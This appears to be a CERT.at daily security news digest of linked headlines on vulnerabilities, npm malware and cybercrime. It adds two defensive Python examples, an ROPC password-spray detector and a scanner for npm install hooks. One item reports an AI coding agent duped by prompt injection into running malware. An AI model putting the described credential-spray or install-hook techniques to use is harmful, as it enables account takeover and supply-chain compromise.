Almost 30,000 companies and public authorities in critical infrastructure must register with the BSI. The portal runs on AWS cloud services.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/nis-2-umsetzung-bsi-schaltet-meldeportal-auf-amazon-servern-frei-2601-203957.html&quot;&gt;https://www.golem.de/news/nis-2-umsetzung-bsi-schaltet-meldeportal-auf-amazon-servern-frei-2601-203957.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;BSI warns: 40 percent of German Zimbra servers are vulnerable&lt;/h3&gt;

A large proportion of all Zimbra servers in Germany still run an outdated version that is susceptible to dangerous security vulnerabilities.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/bsi-warnt-40-prozent-der-deutschen-zimbra-server-sind-angreifbar-2601-203959.html&quot;&gt;https://www.golem.de/news/bsi-warnt-40-prozent-der-deutschen-zimbra-server-sind-angreifbar-2601-203959.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fake Browser Updates Targeting WordPress Administrators via Malicious Plugin&lt;/h3&gt;

We recently investigated a case involving a WordPress website where a customer reported persistent fake pop-up notifications appearing on their site. The warnings were urging them to update their browser (Chrome or Firefox), even though their software was already fully up-to-date.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.sucuri.net/2026/01/fake-browser-updates-targeting-wordpress-administrators-via-malicious-plugin.html&quot;&gt;https://blog.sucuri.net/2026/01/fake-browser-updates-targeting-wordpress-administrators-via-malicious-plugin.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CISA Flags Microsoft Office and HPE OneView Bugs as Actively Exploited&lt;/h3&gt;

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added two security flaws impacting Microsoft Office and Hewlett Packard Enterprise (HPE) OneView to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/cisa-flags-microsoft-office-and-hpe.html&quot;&gt;https://thehackernews.com/2026/01/cisa-flags-microsoft-office-and-hpe.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Researchers Uncover NodeCordRAT Hidden in npm Bitcoin-Themed Packages&lt;/h3&gt;

Cybersecurity researchers have discovered three malicious npm packages that are designed to deliver a previously undocumented malware called NodeCordRAT.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/researchers-uncover-nodecordrat-hidden.html&quot;&gt;https://thehackernews.com/2026/01/researchers-uncover-nodecordrat-hidden.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;IBM's AI agent Bob easily duped to run malware, researchers show&lt;/h3&gt;

Prompt injection lets risky commands slip past guardrails. IBM describes its coding agent thus: &quot;Bob is your AI software development partner that understands your intent, repo, and security standards.&quot; Unfortunately, Bob doesn't always follow those security standards.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/01/07/ibm_bob_vulnerability/&quot;&gt;https://www.theregister.com/2026/01/07/ibm_bob_vulnerability/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Joining forces against cybercrime: awareness campaign for ESC ticket purchases&lt;/h3&gt;

Ahead of the first ticket sales wave starting on 13 January, ORF, EBU, BMI, the City of Vienna, the police and Watchlist Internet are raising awareness of cyber threats and setting up a central reporting point for fraud attempts.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/gemeinsam-gegen-cyber-kriminalitaet-info-offensive-zum-esc-ticketkauf/&quot;&gt;https://www.watchlist-internet.at/news/gemeinsam-gegen-cyber-kriminalitaet-info-offensive-zum-esc-ticketkauf/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Stalkerware operator pleads guilty in rare prosecution&lt;/h3&gt;

The owner of a Michigan-based stalkerware company pleaded guilty to federal charges for selling a product designed to spy on people without their consent.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/stalkerware-guilty-plea-fleming&quot;&gt;https://therecord.media/stalkerware-guilty-plea-fleming&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fake ChatGPT and DeepSeek Extensions Spied on Over 1 Million Chrome Users&lt;/h3&gt;

Security researchers have identified two malicious Chrome extensions recording AI chats. Learn how to identify and remove these tools to protect your privacy.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/fake-chatgpt-deepseek-extensions-spy-chrome-users/&quot;&gt;https://hackread.com/fake-chatgpt-deepseek-extensions-spy-chrome-users/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Discord Controlled NodeCordRAT Steals Chrome Data via NPM Packages&lt;/h3&gt;

Zscaler ThreatLabz identifies three malicious npm packages mimicking Bitcoin libraries. The NodeCordRAT remote access trojan uses Discord commands to exfiltrate MetaMask data and Chrome passwords.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/discord-nodecordrat-steal-chrome-data-npm-packages/&quot;&gt;https://hackread.com/discord-nodecordrat-steal-chrome-data-npm-packages/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The Ransomware Ground Game: How A Christmas Scanning Campaign Will Fuel 2026 Attacks&lt;/h3&gt;

Over four days in December, one operator scanned the internet with 240+ exploits, logging confirmed vulnerabilities that could power targeted intrusions in 2026.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.greynoise.io/blog/christmas-scanning-campaign-fuel-2026-attacks&quot;&gt;https://www.greynoise.io/blog/christmas-scanning-campaign-fuel-2026-attacks&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Decoding the GitHub recommendations for npm maintainers&lt;/h3&gt;

This blog post explores the rationale and implementation behind GitHub's security recommendations for npm maintainers following numerous high-profile supply-chain incidents. It details how hardening publishing infrastructure through trusted publishing, enforced two-factor authentication, and WebAuthn-based protocols can meaningfully increase the resilience of the ecosystem.
&lt;p /&gt;
&lt;A HREF=&quot;https://securitylabs.datadoghq.com/articles/decoding-the-recommendations-for-npm-maintainers/&quot;&gt;https://securitylabs.datadoghq.com/articles/decoding-the-recommendations-for-npm-maintainers/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Abusing ROPC to Bypass MFA - and How I Built a Detection for It in Microsoft Sentinel&lt;/h3&gt;

Among all the OAuth2 grant types available in Azure AD (now Microsoft Entra ID), the Resource Owner Password Credential (ROPC) flow remains one of the most misunderstood - and most abused.
&lt;p /&gt;
&lt;A HREF=&quot;https://detect.fyi/abusing-ropc-to-bypass-mfa-and-how-i-built-a-detection-for-it-in-microsoft-sentinel-135e46aeb7c9&quot;&gt;https://detect.fyi/abusing-ropc-to-bypass-mfa-and-how-i-built-a-detection-for-it-in-microsoft-sentinel-135e46aeb7c9&lt;/a&gt;
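The detection logic the linked post builds in Sentinel can be reproduced offline against exported sign-in records. The following Python is an added example written for this digest, not code from the detect.fyi article or from Microsoft. It assumes sign-in records in the Microsoft Graph signIn shape (authenticationProtocol, ipAddress, status.errorCode) and uses the documented error codes AADSTS50126 (bad credentials) and AADSTS50076 (MFA required); the sample log lines, users and IP addresses are constructed for the example.

```python
import json
from collections import defaultdict

# Constructed sample of Entra ID sign-in records, one JSON object per line. The
# field names follow the Microsoft Graph signIn schema (authenticationProtocol,
# ipAddress, status.errorCode); every user, IP and timestamp here is invented.
SAMPLE_LOG = """
{"createdDateTime":"2026-01-08T07:01:00Z","userPrincipalName":"alice@example.test","appDisplayName":"Microsoft Office","authenticationProtocol":"oAuth2","ipAddress":"203.0.113.10","status":{"errorCode":0}}
{"createdDateTime":"2026-01-08T07:02:00Z","userPrincipalName":"bob@example.test","appDisplayName":"Azure PowerShell","authenticationProtocol":"ropc","ipAddress":"198.51.100.7","status":{"errorCode":50126}}
{"createdDateTime":"2026-01-08T07:02:05Z","userPrincipalName":"carol@example.test","appDisplayName":"Azure PowerShell","authenticationProtocol":"ropc","ipAddress":"198.51.100.7","status":{"errorCode":50126}}
{"createdDateTime":"2026-01-08T07:02:10Z","userPrincipalName":"dave@example.test","appDisplayName":"Azure PowerShell","authenticationProtocol":"ropc","ipAddress":"198.51.100.7","status":{"errorCode":50076}}
{"createdDateTime":"2026-01-08T07:02:15Z","userPrincipalName":"erin@example.test","appDisplayName":"Azure PowerShell","authenticationProtocol":"ropc","ipAddress":"198.51.100.7","status":{"errorCode":0}}
{"createdDateTime":"2026-01-08T07:03:00Z","userPrincipalName":"frank@example.test","appDisplayName":"Microsoft Teams","authenticationProtocol":"oAuth2","ipAddress":"203.0.113.11","status":{"errorCode":0}}
"""

INVALID_CREDENTIALS = 50126  # AADSTS50126: invalid username or password
MFA_REQUIRED = 50076         # AADSTS50076: strong authentication required


def parse_signins(text):
    """Parse JSON-lines sign-in records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def ropc_signins(records):
    """Keep only records where the token request used the ROPC grant."""
    return [r for r in records
            if str(r.get("authenticationProtocol", "")).lower() == "ropc"]


def summarize_by_ip(records):
    """Per source IP, count ROPC attempts that failed on bad credentials, were
    stopped by an MFA requirement, or succeeded outright. A success means a
    token was issued on password alone, i.e. MFA was not enforced for that
    user/app combination."""
    summary = defaultdict(lambda: {"bad_password": 0, "mfa_blocked": 0,
                                   "success_users": set(), "users": set()})
    for r in ropc_signins(records):
        entry = summary[r.get("ipAddress", "unknown")]
        user = r.get("userPrincipalName", "unknown")
        code = r.get("status", {}).get("errorCode")
        entry["users"].add(user)
        if code == 0:
            entry["success_users"].add(user)
        elif code == INVALID_CREDENTIALS:
            entry["bad_password"] += 1
        elif code == MFA_REQUIRED:
            entry["mfa_blocked"] += 1
    return summary


def alerts(records, min_users=3):
    """Alert on any IP that obtained a token via ROPC, and on any IP that tried
    ROPC against at least min_users distinct accounts with password failures
    (the spray pattern ROPC is typically abused for)."""
    out = []
    for ip, s in sorted(summarize_by_ip(records).items()):
        if s["success_users"]:
            out.append(("ropc_success", ip, sorted(s["success_users"])))
        sprayed = min(len(s["users"]), min_users) == min_users  # len at least min_users
        if sprayed and s["bad_password"]:
            out.append(("ropc_spray", ip, len(s["users"])))
    return out


if __name__ == "__main__":
    for alert in alerts(parse_signins(SAMPLE_LOG)):
        print(alert)
```

The point worth checking in your own tenant is the ropc_success case: a successful ROPC sign-in proves that a password alone was enough for that user and application, so Conditional Access did not require MFA on that path. The 50076 failures show the policy working; the 50126 burst across many accounts from one IP is the spray that ROPC makes cheap.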

&lt;hr&gt;

&lt;h3&gt;Preparing for Post-Quantum Cryptography&lt;/h3&gt;

Learn what you can do today to prepare for Q-Day.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.wiz.io/blog/preparing-for-post-quantum-cryptography&quot;&gt;https://www.wiz.io/blog/preparing-for-post-quantum-cryptography&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;npm to Implement Staged Publishing After Turbulent Shift Off Classic Tokens&lt;/h3&gt;

The JavaScript ecosystem spent much of 2025 responding to a sustained run of supply chain attacks, but it was the multi-wave Shai-Hulud campaign that ultimately reset expectations for what large-scale, automated compromise looks like. By the end of the year, organizations with JavaScript-heavy infrastructure were no longer treating supply chain malware as an edge case, but as an operational risk that could spread faster than human review. Now, npm says it is preparing its next major response.
&lt;p /&gt;
&lt;A HREF=&quot;https://socket.dev/blog/npm-to-implement-staged-publishing&quot;&gt;https://socket.dev/blog/npm-to-implement-staged-publishing&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Crimson Collective Claims to Disconnect Brightspeed Internet Users After Hack&lt;/h3&gt;

The hacking group Crimson Collective claims to have access to Brightspeed's infrastructure and is disconnecting users from the company's home internet services. The group made its latest claims in a post on Telegram yesterday. &quot;Hey BrightSpeed, we disconnected a lot of your users' home internet.. they might be complaining you should check,&quot; the Telegram post says.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/crimson-collective-disconnects-brightspeed/&quot;&gt;https://thecyberexpress.com/crimson-collective-disconnects-brightspeed/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Trump Orders US Exit from Global Cyber and Hybrid Threat Coalitions&lt;/h3&gt;

President Donald Trump has ordered the immediate withdrawal of the United States from several premier international bodies dedicated to cybersecurity, digital human rights, and countering hybrid warfare, as part of a major restructuring of American defense and diplomatic posture.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/trump-orders-us-exit-from-cyber-coalitions/&quot;&gt;https://thecyberexpress.com/trump-orders-us-exit-from-cyber-coalitions/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;UK Moves to Close Public Sector Cyber Gaps With Government Cyber Action Plan&lt;/h3&gt;

The UK government has revealed the Government Cyber Action Plan as a renewed effort to close the growing gap between escalating cyber threats and the public sector's ability to respond effectively. The move comes amid a series of cyberattacks targeting UK retail and manufacturing sectors, incidents that have underscored broader vulnerabilities affecting critical services and government operations.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/uk-government-cyber-action-plan/&quot;&gt;https://thecyberexpress.com/uk-government-cyber-action-plan/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Max severity Ni8mare flaw lets hackers hijack n8n servers&lt;/h3&gt;

A maximum severity vulnerability dubbed &quot;Ni8mare&quot; allows remote, unauthenticated attackers to take control of locally deployed instances of the n8n workflow automation platform.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/max-severity-ni8mare-flaw-lets-hackers-hijack-n8n-servers/&quot;&gt;https://www.bleepingcomputer.com/news/security/max-severity-ni8mare-flaw-lets-hackers-hijack-n8n-servers/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Critical jsPDF flaw lets hackers steal secrets via generated PDFs&lt;/h3&gt;

The jsPDF library for generating PDF documents in JavaScript applications contains a critical vulnerability that allows an attacker to steal sensitive data from the local filesystem by having it included in generated files.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/critical-jspdf-flaw-lets-hackers-steal-secrets-via-generated-pdfs/&quot;&gt;https://www.bleepingcomputer.com/news/security/critical-jspdf-flaw-lets-hackers-steal-secrets-via-generated-pdfs/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The installers for multiple PIONEER products may insecurely load Dynamic Link Libraries&lt;/h3&gt;

The installers for multiple products provided by PIONEER CORPORATION may insecurely load Dynamic Link Libraries. Arbitrary code may be executed with the privileges of the running installer.
&lt;p /&gt;
&lt;A HREF=&quot;https://jvn.jp/en/jp/JVN17956874/&quot;&gt;https://jvn.jp/en/jp/JVN17956874/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;zlib: critical vulnerability allows code injection - no update yet&lt;/h3&gt;

Security researchers have discovered a critical vulnerability in a tool shipped with the zlib compression library, which is included in numerous programs and operating systems. Under certain circumstances it allows injecting and executing malicious code. No update to close the hole is available yet.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/zlib-Kritische-Sicherheitsluecke-ermoeglicht-Codeschmuggel-noch-kein-Update-11133774.html&quot;&gt;https://www.heise.de/news/zlib-Kritische-Sicherheitsluecke-ermoeglicht-Codeschmuggel-noch-kein-Update-11133774.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Seven critical maximum-severity vulnerabilities threaten Coolify&lt;/h3&gt;

Admins of Platform-as-a-Service environments based on Coolify should promptly bring their instances up to date. Otherwise, attackers can exploit, among others, seven &quot;critical&quot; vulnerabilities with the highest rating (CVSS score 10 of 10) to fully compromise servers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Sieben-kritische-Sicherheitsluecken-mit-Hoechstwertung-bedrohen-Coolify-11134510.html&quot;&gt;https://www.heise.de/news/Sieben-kritische-Sicherheitsluecken-mit-Hoechstwertung-bedrohen-Coolify-11134510.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Kanboard vulnerability allows login as any user&lt;/h3&gt;

The open-source Kanban tool Kanboard is affected by three vulnerabilities. One of them is rated a critical risk by the developers and allows logging in as any user, provided a certain configuration option is set.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Kanboard-Sicherheitsluecke-ermoeglicht-Anmeldung-als-beliebiger-User-11134247.html&quot;&gt;https://www.heise.de/news/Kanboard-Sicherheitsluecke-ermoeglicht-Anmeldung-als-beliebiger-User-11134247.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Thursday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (gcc-toolset-14-binutils, gcc-toolset-15-binutils, httpd, kernel, libpng, mariadb, mingw-libpng, poppler, python3.12, and ruby:3.3), Debian (foomuuri and libsodium), Fedora (python-pdfminer and wget2), Oracle (audiofile, bind, gcc-toolset-15-binutils, libpng, mariadb, mariadb10.11, mariadb:10.11, mariadb:10.5, mingw-libpng, poppler, and python3.12), Red Hat (git-lfs, kernel, libpng, libpq, mariadb:10.3, osbuild-composer, postgresql, postgresql:13, and postgresql:15), Slackware (curl), SUSE (c-ares-devel, capstone, curl, gpsd, ImageMagick, libpcap, log4j, python311-filelock, and python314), and Ubuntu (libcaca, libxslt, and net-snmp).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1053277/&quot;&gt;https://lwn.net/Articles/1053277/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;[R1] Nessus Agent Versions 11.0.3 and 10.9.3 Fix One Vulnerability&lt;/h3&gt;

A vulnerability has been identified in the installation/uninstallation of the Nessus Agent Tray App on Windows hosts which could lead to escalation of privileges. Tenable has released Nessus Agent 11.0.3 and Nessus Agent 10.9.3 to address this issue.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.tenable.com/security/tns-2026-01&quot;&gt;https://www.tenable.com/security/tns-2026-01&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CVE-2025-42877: Memory Corruption in SAP Web Dispatcher&lt;/h3&gt;

SAP Web Dispatcher and Internet Communication Manager (ICM) contain a critical memory corruption vulnerability in the HTTP header parsing function. The vulnerability allows an unauthenticated attacker to cause heap corruption and lead to Denial of Service through specially crafted HTTP requests.
&lt;p /&gt;
&lt;A HREF=&quot;https://redrays.io/blog/cve-2025-42877-sap-web-dispatcher-memory-corruption-analysis/&quot;&gt;https://redrays.io/blog/cve-2025-42877-sap-web-dispatcher-memory-corruption-analysis/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Case opened: DIVD-2025-00011 - Severe vulnerabilities in Growatt portal&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://csirt.divd.nl/cases/DIVD-2025-00011/&quot;&gt;https://csirt.divd.nl/cases/DIVD-2025-00011/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-08T19:11:30Z</dc:date></entry><entry><title>Tageszusammenfassung - 07.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-07012026"/><author><name>CERT.at</name></author><updated>2026-01-07T18:14:42Z</updated><published>2026-01-07T18:14:42Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Monday 05-01-2026 18:00 - Wednesday 07-01-2026 18:00
Handler:     Alexander Riepl
Co-Handler:  n/a


&lt;h2&gt;      News       &lt;/h2&gt;



&lt;h3&gt;New D-Link flaw in legacy DSL routers actively exploited in attacks&lt;/h3&gt;

Threat actors are exploiting a recently discovered command injection vulnerability that affects multiple D-Link DSL gateway routers that went out of support years ago.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/new-d-link-flaw-in-legacy-dsl-routers-actively-exploited-in-attacks/&quot;&gt;https://www.bleepingcomputer.com/news/security/new-d-link-flaw-in-legacy-dsl-routers-actively-exploited-in-attacks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ownCloud urges users to enable MFA after credential theft reports&lt;/h3&gt;

File-sharing platform ownCloud warned users today to enable multi-factor authentication (MFA) to block attackers using compromised credentials from stealing their data.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/owncloud-urges-users-to-enable-mfa-after-credential-theft-reports/&quot;&gt;https://www.bleepingcomputer.com/news/security/owncloud-urges-users-to-enable-mfa-after-credential-theft-reports/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft: Classic Outlook bug prevents opening encrypted emails&lt;/h3&gt;

Microsoft has confirmed a known issue that prevents recipients from opening encrypted emails in classic Outlook.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/microsoft/microsoft-classic-outlook-bug-prevents-opening-encrypted-emails/&quot;&gt;https://www.bleepingcomputer.com/news/microsoft/microsoft-classic-outlook-bug-prevents-opening-encrypted-emails/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Founder of Spyware Maker PcTattletale Pleads Guilty To Hacking, Advertising Surveillance Software&lt;/h3&gt;

An anonymous reader quotes a report from TechCrunch: The founder of a U.S.-based spyware company, whose surveillance products allowed customers to spy on the phones and computers of unsuspecting victims, pleaded guilty to federal charges linked to his long-running operation. pcTattletale founder Bryan Fleming entered a guilty plea in a San Diego federal ..
&lt;p /&gt;
&lt;A HREF=&quot;https://yro.slashdot.org/story/26/01/07/0033238/founder-of-spyware-maker-pctattletale-pleads-guilty-to-hacking-advertising-surveillance-software&quot;&gt;https://yro.slashdot.org/story/26/01/07/0033238/founder-of-spyware-maker-pctattletale-pleads-guilty-to-hacking-advertising-surveillance-software&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;UK injects just £210M into cyber plan to stop Whitehall getting pwnd&lt;/h3&gt;

Central government will supposedly be as secure as energy facilities and datacenters under new proposals. The UK today launches its Government Cyber Action Plan, committing £210 million ($282 million) to strengthen defenses across digital public services and hold itself to the same cybersecurity standards it's imposing on critical infrastructure operators.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/01/06/government_cyber_action_plan/&quot;&gt;https://www.theregister.com/2026/01/06/government_cyber_action_plan/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malicious NPM Packages Deliver NodeCordRAT&lt;/h3&gt;

Zscaler ThreatLabz regularly monitors the npm database for suspicious packages. In November 2025, ThreatLabz identified three malicious packages: bitcoin-main-lib, bitcoin-lib-js, and bip40. The bitcoin-main-lib and bitcoin-lib-js packages execute a postinstall.cjs script during installation, which installs bip40, the package that contains the ..
&lt;p /&gt;
&lt;A HREF=&quot;https://www.zscaler.com/blogs/security-research/malicious-npm-packages-deliver-nodecordrat&quot;&gt;https://www.zscaler.com/blogs/security-research/malicious-npm-packages-deliver-nodecordrat&lt;/a&gt;
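The delivery chain described above relies on npm's install-time lifecycle scripts: a dependency with a postinstall entry runs code the moment it is installed. The following Python scanner is an added example for this digest, not code from Zscaler or from npm. It walks a node_modules tree and reports every package that declares an install hook; the manifests it creates for the demo are constructed with invented package names, not the packages named in the report.

```python
import json
import os
import tempfile

# Lifecycle hooks that npm runs automatically during "npm install". A malicious
# package needs only one of them to execute code on the developer's machine.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def install_scripts(manifest):
    """Return {hook: command} for each install-time lifecycle script declared
    in a parsed package.json."""
    scripts = manifest.get("scripts") or {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def scan_node_modules(root):
    """Walk a node_modules tree and report every package that declares an
    install hook. Returns sorted (package name, hook, command) tuples."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, do not crash the scan
        name = manifest.get("name") or os.path.relpath(dirpath, root)
        for hook, cmd in install_scripts(manifest).items():
            findings.append((name, hook, cmd))
    return sorted(findings)


def build_sample_tree():
    """Create a throwaway node_modules with constructed manifests (invented
    package names, not the ones from the Zscaler report) so the scanner can be
    exercised offline."""
    root = os.path.join(tempfile.mkdtemp(), "node_modules")
    samples = [
        {"name": "harmless-lib", "version": "1.0.0",
         "scripts": {"test": "node test.js"}},
        {"name": "example-coin-lib", "version": "0.0.1",
         "scripts": {"postinstall": "node postinstall.cjs"}},
        {"name": "another-dep", "version": "2.3.0",
         "scripts": {"preinstall": "node setup.js", "build": "tsc"}},
    ]
    for manifest in samples:
        pkg_dir = os.path.join(root, manifest["name"])
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    for name, hook, cmd in scan_node_modules(build_sample_tree()):
        print(f"{name}: {hook} runs {cmd!r}")
```

Run it against a real project's node_modules to get a short list of packages that execute code at install time; each one deserves a look at what the script actually does. The preventive counterpart is to install with npm install --ignore-scripts (or ignore-scripts=true in .npmrc) on CI and developer machines and to allow-list the few packages that genuinely need a build step.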

&lt;hr&gt;

&lt;h3&gt;CISA catalog of exploited vulnerabilities grew by 20 percent in 2025&lt;/h3&gt;

The US IT security agency CISA maintains a catalog of vulnerabilities under active attack. It grew somewhat faster in 2025.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/CISA-Katalog-attackierter-Schwachstellen-wuchs-2025-um-20-Prozent-11130460.html&quot;&gt;https://www.heise.de/news/CISA-Katalog-attackierter-Schwachstellen-wuchs-2025-um-20-Prozent-11130460.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Patch day: Dolby Digital vulnerability in Android closed&lt;/h3&gt;

Android devices are vulnerable to a zero-click attack. This security issue has now been fixed.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Patchday-Dolby-Digital-Sicherheitsluecke-in-Android-geschlossen-11130450.html&quot;&gt;https://www.heise.de/news/Patchday-Dolby-Digital-Sicherheitsluecke-in-Android-geschlossen-11130450.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Ubiquiti UniFi Protect: vulnerability allows access to cameras&lt;/h3&gt;

In the UniFi Protect application, attackers can abuse vulnerabilities to gain unauthorized access to cameras and to mount DoS attacks.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Ubiquiti-UniFi-Protect-Sicherheitsluecke-ermoeglicht-Zugriff-auf-Kameras-11131097.html&quot;&gt;https://www.heise.de/news/Ubiquiti-UniFi-Protect-Sicherheitsluecke-ermoeglicht-Zugriff-auf-Kameras-11131097.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Multiple vulnerabilities threaten Veeam Backup &amp; Replication&lt;/h3&gt;

An important security update closes several vulnerabilities in Veeam Backup &amp; Replication. No attacks are known so far.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Mehrere-Sicherheitsluecken-bedrohen-Veeam-Back-Replication-11132196.html&quot;&gt;https://www.heise.de/news/Mehrere-Sicherheitsluecken-bedrohen-Veeam-Back-Replication-11132196.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Crypto phishing with a supposed email from the Bundeszentralamt für Steuern&lt;/h3&gt;

A current phishing wave claims discrepancies in &quot;crypto declarations&quot; at the Bundeszentralamt für Steuern (Germany's Federal Central Tax Office).
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Krypto-Phishing-mit-angeblicher-Mail-des-Bundeszentralamts-fuer-Steuern-11132880.html&quot;&gt;https://www.heise.de/news/Krypto-Phishing-mit-angeblicher-Mail-des-Bundeszentralamts-fuer-Steuern-11132880.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;2025, the year of the Infostealer&lt;/h3&gt;

Infostealers are not new malware. They have been around for decades. What has changed is how effective they have become, and how easily they blend into normal user behaviour. In 2025, infostealers became the fastest growing malware category, overtaking ransomware in terms of deployment and spread. The H1 2025 reports highlighted a sharp rise in simple ..
&lt;p /&gt;
&lt;A HREF=&quot;https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/&quot;&gt;https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Russian hackers target European hospitality industry with &quot;blue screen of death&quot; malware&lt;/h3&gt;

The scheme starts with a fake reservation cancellation that impersonates a popular booking site, and eventually prompts victims with an error message and &quot;Blue Screen of Death&quot; page.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/russian-hackers-europe-hospitality-blue-screen&quot;&gt;https://therecord.media/russian-hackers-europe-hospitality-blue-screen&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Alleged cyber scam kingpin arrested, extradited to China&lt;/h3&gt;

Chen Zhi's arrest is the latest chapter in the remarkable downfall of one of the country's most prominent businesses, with holdings in the real estate, banking, entertainment and airline industries.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/alleged-cyber-scam-kingpin-cambodia-arrested-extradited&quot;&gt;https://therecord.media/alleged-cyber-scam-kingpin-cambodia-arrested-extradited&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Analysis of a Fake Cloudflare Turnstile Used as a Traffic Filtering Gate&lt;/h3&gt;

During analysis of a phishing URL chain, I observed a fake Cloudflare Turnstile verification page acting as an intelligent traffic filtering gate. Rather than protecting a website, this page selectively blocks, redirects, or allows access based on geolocation, proxy usage, and browser fingerprinting. This phishing infrastructure demonstrates Traffic Distribution System like behavior ..
&lt;p /&gt;
&lt;A HREF=&quot;https://malwr-analysis.com/2026/01/07/analysis-of-a-fake-cloudflare-turnstile-used-as-a-traffic-filtering-gate/&quot;&gt;https://malwr-analysis.com/2026/01/07/analysis-of-a-fake-cloudflare-turnstile-used-as-a-traffic-filtering-gate/&lt;/a&gt;

&lt;hr&gt;


&lt;h2&gt; Vulnerabilities &lt;/h2&gt;



